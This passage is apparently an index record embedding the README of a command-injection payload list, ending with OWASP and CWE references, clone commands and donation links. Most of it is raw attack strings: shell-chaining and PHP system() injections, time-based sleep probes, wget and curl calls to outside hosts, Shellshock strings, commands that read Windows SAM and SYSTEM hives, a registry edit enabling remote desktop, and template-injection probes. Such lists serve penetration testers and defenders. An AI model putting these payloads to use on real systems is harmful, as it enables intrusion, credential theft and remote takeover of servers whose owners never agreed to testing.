XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\");?\u003e\n\u003c?php system(\"sleep 10\");?\u003e\n\u003c?php system(\"sleep 5\");?\u003e\n\u003c?php system(\"wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get\");?\u003e\n\u003c?php system(\"wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc\");?\u003e\n:phpversion();\n`ping 127.0.0.1`\n\u0026 ping -i 30 127.0.0.1 \u0026\n\u0026 ping -n 30 127.0.0.1 \u0026\n;${@print(md5(RCEVulnerable))};\n${@print(\"RCEVulnerable\")}\n${@print(system($_SERVER['HTTP_USER_AGENT']))}\npwd\n| pwd\n; pwd\n\u0026 pwd\n\u0026\u0026 pwd\n\\r\n| reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n; reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\u0026 reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\u0026\u0026 reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\\r\\n\nroute\n| sleep 1\n; sleep 1\n\u0026 sleep 1\n\u0026\u0026 sleep 1\nsleep 1\n|| sleep 10\n| sleep 10\n; sleep 10\n{${sleep(10)}}\n\u0026 sleep 10 \n\u0026\u0026 sleep 10\nsleep 10\n|| sleep 15\n| sleep 15\n; sleep 15\n\u0026 sleep 15 \n\u0026\u0026 sleep 15\n {${sleep(20)}}\n{${sleep(20)}}\n {${sleep(3)}}\n{${sleep(3)}}\n| sleep 5\n; sleep 5\n\u0026 sleep 5\n\u0026\u0026 sleep 5\nsleep 5\n {${sleep(hexdec(dechex(20)))}} \n{${sleep(hexdec(dechex(20)))}} \nsysinfo\n| sysinfo\n; sysinfo\n\u0026 sysinfo\n\u0026\u0026 sysinfo\nsystem('cat C:\\boot.ini');\nsystem('cat config.php');\n|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');\n| system('curl https://crowdshield.com/.testing/rce_vuln.txt');\n; system('curl https://crowdshield.com/.testing/rce_vuln.txt');\n\u0026 system('curl https://crowdshield.com/.testing/rce_vuln.txt');\n\u0026\u0026 system('curl https://crowdshield.com/.testing/rce_vuln.txt');\nsystem('curl https://crowdshield.com/.testing/rce_vuln.txt')\nsystem('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')\nsystem('curl https://xerosecurity.com/.testing/rce_vuln.txt');\nsystem('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\nsysteminfo\n| systeminfo\n; systeminfo\n\u0026 systeminfo\n\u0026\u0026 systeminfo\nsystem('ls')\nsystem('pwd')\nsystem('pwd');\n|| system('sleep 5');\n| system('sleep 5');\n; system('sleep 5');\n\u0026 system('sleep 5');\n\u0026\u0026 system('sleep 5');\nsystem('sleep 5')\nsystem('sleep 5');\nsystem('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')\nsystem('wget https://xerosecurity.com/.testing/rce_vuln.txt');\nsystem('whoami')\nsystem('whoami');\ntest*; ls -lhtR /var/www/\ntest* || perl -e 'print \"X\"x16096'\ntest* | perl -e 'print \"X\"x16096'\ntest* \u0026 perl -e 'print \"X\"x16096'\ntest* \u0026\u0026 perl -e 'print \"X\"x16096'\ntest*; perl -e 'print \"X\"x16096'\n$(`type C:\\boot.ini`)\n\u0026\u0026type C:\\\\boot.ini\n| type C:\\Windows\\repair\\SAM\n; type C:\\Windows\\repair\\SAM\n\u0026 type C:\\Windows\\repair\\SAM\n\u0026\u0026 type C:\\Windows\\repair\\SAM\ntype C:\\Windows\\repair\\SAM\n| type C:\\Windows\\repair\\SYSTEM\n; type C:\\Windows\\repair\\SYSTEM\n\u0026 type C:\\Windows\\repair\\SYSTEM\n\u0026\u0026 type C:\\Windows\\repair\\SYSTEM\ntype C:\\Windows\\repair\\SYSTEM\n| type C:\\WINNT\\repair\\SAM\n; type C:\\WINNT\\repair\\SAM\n\u0026 type C:\\WINNT\\repair\\SAM\n\u0026\u0026 type C:\\WINNT\\repair\\SAM\ntype C:\\WINNT\\repair\\SAM\ntype C:\\WINNT\\repair\\SYSTEM\n| type %SYSTEMROOT%\\repair\\SAM\n; type %SYSTEMROOT%\\repair\\SAM\n\u0026 type %SYSTEMROOT%\\repair\\SAM\n\u0026\u0026 type %SYSTEMROOT%\\repair\\SAM\ntype %SYSTEMROOT%\\repair\\SAM\n| type %SYSTEMROOT%\\repair\\SYSTEM\n; type %SYSTEMROOT%\\repair\\SYSTEM\n\u0026 type %SYSTEMROOT%\\repair\\SYSTEM\n\u0026\u0026 type %SYSTEMROOT%\\repair\\SYSTEM\ntype %SYSTEMROOT%\\repair\\SYSTEM\nuname\n;uname;\n| uname -a\n; uname -a\n\u0026 uname -a\n\u0026\u0026 uname -a\nuname -a\n|/usr/bin/id\n;|/usr/bin/id|\n;/usr/bin/id|\n$;/usr/bin/id\n() { :;};/usr/bin/perl -e 'print \\\"Content-Type: text/plain\\\\r\\\\n\\\\r\\\\nXSUCCESS!\\\";system(\\\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\\\");'\n() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11\n| wget http://crowdshield.com/.testing/rce.txt\n\u0026 wget http://crowdshield.com/.testing/rce.txt\n; wget https://crowdshield.com/.testing/rce_vuln.txt\n$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)\n\u0026\u0026 wget https://crowdshield.com/.testing/rce_vuln.txt\nwget https://crowdshield.com/.testing/rce_vuln.txt\n$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)\nwhich curl\nwhich gcc\nwhich nc\nwhich netcat\nwhich perl\nwhich python\nwhich wget\nwhoami\n| whoami\n; whoami\n' whoami\n' || whoami\n' \u0026 whoami\n' \u0026\u0026 whoami\n'; whoami\n\" whoami\n\" || whoami\n\" | whoami\n\" \u0026 whoami\n\" \u0026\u0026 whoami\n\"; whoami\n$(`whoami`)\n\u0026 whoami\n\u0026\u0026 whoami\n{{ get_user_file(\"C:\\boot.ini\") }}\n{{ get_user_file(\"/etc/hosts\") }}\n{{4+4}}\n{{4+8}}\n{{person.secret}}\n{{person.name}}\n{1} + {1}\n{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}\n{{[] .__ Class __.__ base __.__ subclasses __ ()}}\n```\n#### References :\n\n###### Testing for Command Injection (OTG-INPVAL-013)\n\n* 👉 https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)\n\n###### OWASP Command Injection\n\n* 👉 https://www.owasp.org/index.php/Command_Injection\n\n###### WE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')\n\n* 👉 http://cwe.mitre.org/data/definitions/77.html\n\n###### WE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'\n\n* 👉 http://cwe.mitre.org/data/definitions/78.html\n\n###### Portswigger Web Security - OS Command Injection\n\n* 👉 https://portswigger.net/kb/issues/00100100_os-command-injection\n\n### Cloning an Existing Repository ( Clone with HTTPS )\n```\nroot@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/command-injection-payload-list.git\n```\n\n### Cloning an Existing Repository ( Clone with SSH )\n```\nroot@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/command-injection-payload-list.git\n```\n\n##### Donate!\n\nSupport the authors:\n\n##### Paypal:\n\nhttps://paypal.me/ismailtsdln\n\n##### LiberaPay:\n\n\u003cnoscript\u003e\u003ca href=\"https://liberapay.com/ismailtasdelen/donate\"\u003e\u003cimg alt=\"Donate using Liberapay\" src=\"https://liberapay.com/assets/widgets/donate.svg\"\u003e\u003c/a\u003e\u003c/noscript\u003e\n","funding_links":["https://liberapay.com/ismailtasdelen","https://paypal.me/ismailtsdln","https://liberapay.com/ismailtasdelen/donate"],"categories":["Introduction","Others","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"783f861b9f822127dba99acb55687cbb\"\u003e\u003c/a\u003e工具","Pentesting"],"sub_categories":["Command Injection","\u003ca id=\"80301821d0f5d8ec2dd3754ebb1b4b10\"\u003e\u003c/a\u003ePayload\u0026\u0026远控\u0026\u0026RAT","\u003ca id=\"b5d99a78ddb383c208aae474fc2cb002\"\u003e\u003c/a\u003ePayload收集","Payloads"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpayloadbox%2Fcommand-injection-payload-list","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpayloadbox%2Fcommand-injection-payload-list","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpayloadbox%2Fcommand-injection-payload-list/lists"}